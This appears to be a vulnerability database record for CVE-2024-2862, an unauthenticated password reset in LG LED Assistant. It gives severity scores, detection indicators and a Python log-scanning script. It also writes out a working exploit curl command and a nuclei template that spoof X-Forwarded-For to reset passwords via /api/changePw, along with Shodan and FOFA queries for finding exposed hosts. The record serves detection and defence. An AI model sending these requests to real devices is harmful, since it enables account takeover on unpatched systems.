cbcvebase.
CVE-2024-2862
published 2024-03-25

CVE-2024-2862: This vulnerability allows remote attackers to reset the password of anonymous users without authorization on the affected LG LED Assistant.

Priority: P1 91 · critical · 9.8 (CVSS 3.1)
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
Tags: ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 51.28% (98.8th percentile)

Affected (2 ranges)

Vendor           Product            Version range   Fixed in
lg               lg_led_assistant
lg_electronics   lg_led_assistant

Detection & IOCs (extracted from sources)

url: /api/changePw
port: 8787
command: curl -k -X PUT -H 'X-Forwarded-For:127.0.0.1' -d 'newPw=Password@123&hostName=hostName&to=to&user=user&from=from' 'https://:8787/api/changePw'
nuclei template
id: CVE-2024-2862
info:
  name: LG LED Assistant - Unauthenticated Password Reset
  author: beginee
  severity: high
http:
  - raw:
      - |
        PUT /api/changePw HTTP/1.1
        Host: {{Hostname}}
        X-Forwarded-For: 127.0.0.1
        User-Agent: test
        Content-Type: application/x-www-form-urlencoded

        newPw={{new_password}}&hostName={{hostname}}&to=to&user={{username}}&from=from
    # matchers belong inside the http request entry, not at the top level of the template
    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "{\"resCode\":\"SUCCESS\"}")'
          - 'status_code == 200'
        condition: and
  • Detect PUT requests to /api/changePw carrying an X-Forwarded-For header value of 127.0.0.1: this is the attacker's method of spoofing localhost to trigger the unauthenticated password reset.
  • A successful exploit returns the JSON response body {"resCode":"SUCC"} or {"resCode":"SUCCESS"}; monitor HTTP responses on port 8787 for these strings following PUT /api/changePw requests.
  • Use the Shodan query 'http.title:"LG LED Assistant"' or the FOFA icon_hash '195291629' to identify exposed LG LED Assistant instances on the internet.
  • The vulnerable logic resides in Common.js (endpoint /api/changePw); monitor for unauthenticated PUT requests to this path on the application server.
  • At the time of advisory publication, no vendor patch or mitigation was available for LG LED Assistant v2.1.65.
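The detection bullets above can be turned into a small log-scanning rule set. The script below is an added example, not code from this record or from LG: it parses constructed access-log lines (the log format, including the xff= and body= fields, is an assumption; real servers need their own regex) and flags the three patterns the bullets describe: any PUT to /api/changePw, a PUT whose X-Forwarded-For claims 127.0.0.1 while the TCP peer is not loopback, and a 200 response whose body carries one of the advisory's success markers.

```python
import re
from collections import Counter
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional

# Assumed log format (constructed for this example): combined-log prefix, then the
# X-Forwarded-For value and the first bytes of the response body. Adjust to your server.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
    r'xff="(?P<xff>[^"]*)" body="(?P<body>.*)"$'
)

TARGET_PATH = "/api/changePw"                       # endpoint named in the advisory
SUCCESS_MARKERS = ('"resCode":"SUCC"', '"resCode":"SUCCESS"')  # response strings from the advisory

# Constructed sample lines; the IPs are documentation ranges, not real hosts.
SAMPLE_LOG_LINES = [
    r'10.0.0.5 - - [25/Mar/2024:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 xff="-" body="<html>"',
    r'203.0.113.9 - - [25/Mar/2024:10:01:07 +0000] "PUT /api/changePw HTTP/1.1" 200 xff="127.0.0.1" body="{\"resCode\":\"SUCCESS\"}"',
    r'203.0.113.9 - - [25/Mar/2024:10:01:09 +0000] "PUT /api/changePw HTTP/1.1" 401 xff="-" body="{\"resCode\":\"FAIL\"}"',
    r'198.51.100.4 - - [25/Mar/2024:10:02:00 +0000] "PUT /api/changePw HTTP/1.1" 200 xff="127.0.0.1" body="{\"resCode\":\"SUCC\"}"',
    r'127.0.0.1 - - [25/Mar/2024:10:05:00 +0000] "PUT /api/changePw HTTP/1.1" 200 xff="-" body="{\"resCode\":\"SUCCESS\"}"',
    "this line is malformed and must be skipped, not crash the scanner",
]


@dataclass(frozen=True)
class Finding:
    src: str
    ts: str
    rule: str
    severity: str


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Return the named fields of one log line, or None if it does not match the format."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def check_request(rec: Dict[str, str]) -> List[Finding]:
    """Apply the advisory's detection rules to one parsed request."""
    findings: List[Finding] = []
    if rec["method"] != "PUT" or rec["path"].split("?", 1)[0] != TARGET_PATH:
        return findings
    # Rule 1: every PUT to the reset endpoint is worth a record on its own.
    findings.append(Finding(rec["src"], rec["ts"], "changepw-put-request", "medium"))
    # Rule 2: X-Forwarded-For claiming loopback while the actual peer is remote is the spoof pattern.
    xff_values = [v.strip() for v in rec["xff"].split(",")]
    if "127.0.0.1" in xff_values and rec["src"] != "127.0.0.1":
        findings.append(Finding(rec["src"], rec["ts"], "xff-localhost-spoof", "high"))
    # Rule 3: HTTP 200 with a success marker means the reset actually went through.
    body = rec["body"].replace('\\"', '"')   # undo the log's quote escaping
    if rec["status"] == "200" and any(marker in body for marker in SUCCESS_MARKERS):
        findings.append(Finding(rec["src"], rec["ts"], "password-reset-succeeded", "critical"))
    return findings


def scan(lines: Iterable[str]) -> List[Finding]:
    """Run the rules over a stream of log lines, skipping lines that do not parse."""
    findings: List[Finding] = []
    for line in lines:
        rec = parse_line(line)
        if rec is not None:
            findings.extend(check_request(rec))
    return findings


def summarize(findings: Iterable[Finding]) -> Dict[str, int]:
    """Count findings per rule name."""
    return dict(Counter(f.rule for f in findings))


if __name__ == "__main__":
    results = scan(SAMPLE_LOG_LINES)
    for f in results:
        print(f"{f.severity:8} {f.rule:26} {f.src:14} {f.ts}")
    print(summarize(results))
```

The loopback request at the end of the sample set produces a request and a success finding but no spoof finding, which is the distinction a SOC analyst needs: a reset from the appliance itself is routine, a reset whose only claim to being local is a header is not.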

CVSS provenance

Source      Version   Score   Severity   Vector
nvd         v3.1      9.8     CRITICAL   CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck             9.1     CRITICAL